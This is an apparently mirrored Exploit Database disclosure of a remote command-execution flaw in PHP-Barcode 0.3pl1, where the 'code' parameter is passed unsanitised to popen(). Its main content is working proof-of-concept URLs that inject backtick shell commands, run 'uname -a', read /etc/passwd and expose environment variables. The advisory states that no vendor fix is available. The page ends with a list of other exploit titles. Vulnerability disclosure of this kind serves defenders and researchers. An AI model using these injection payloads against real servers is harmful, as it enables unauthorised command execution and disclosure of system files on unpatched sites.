PHP-Barcode 0.3pl1 – Remote Code Execution

Exploit Database
15 阅读

作者： beford

日期： 2011-07-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17573/

PHP-Barcode 0.3pl1 Remote Code Execution

The input passed to the code parameter is not sanitized and is used on
a popen() function. This allows remote command execution and also
allows to see environment vars:

Windows

http://www.site.com/php-barcode/barcode.php?code=%TMP%

Linux

http://www.site.com/php-barcode/barcode.php?code=012$PATH$d
http://www.site.com/php-barcode/barcode.php?code=`uname%20-a`
http://www.site.com/php-barcode/barcode.php?code=`tail%20-1%20/etc/passwd`

Vendor:
http://www.ashberg.de/php-barcode/download/

Vendor informed:
July6 / 2011

Vendor acknowledgement:
July 7 / 2011

Fix not available from vendor.

- beford

last Exploits
PHP-Barcode 0.3pl1 – Remote Code Execution的更多信息

Inim Electronics Smartliving SmartLAN 6.x – Unauthenticated Server-Side Request Forgery：
Bludit 3.9.2 – Directory Traversal：
Centreon 19.10.5 – ‘centreontrapd’ Remote Command Execution：
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway – Configuration Download：
IPFire 2.19 – Remote Code Execution：
NodeBB Plugin Emoji 3.2.1 – Arbitrary File Write：
Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities：
xEpan 1.0.4 – Multiple Vulnerabilities：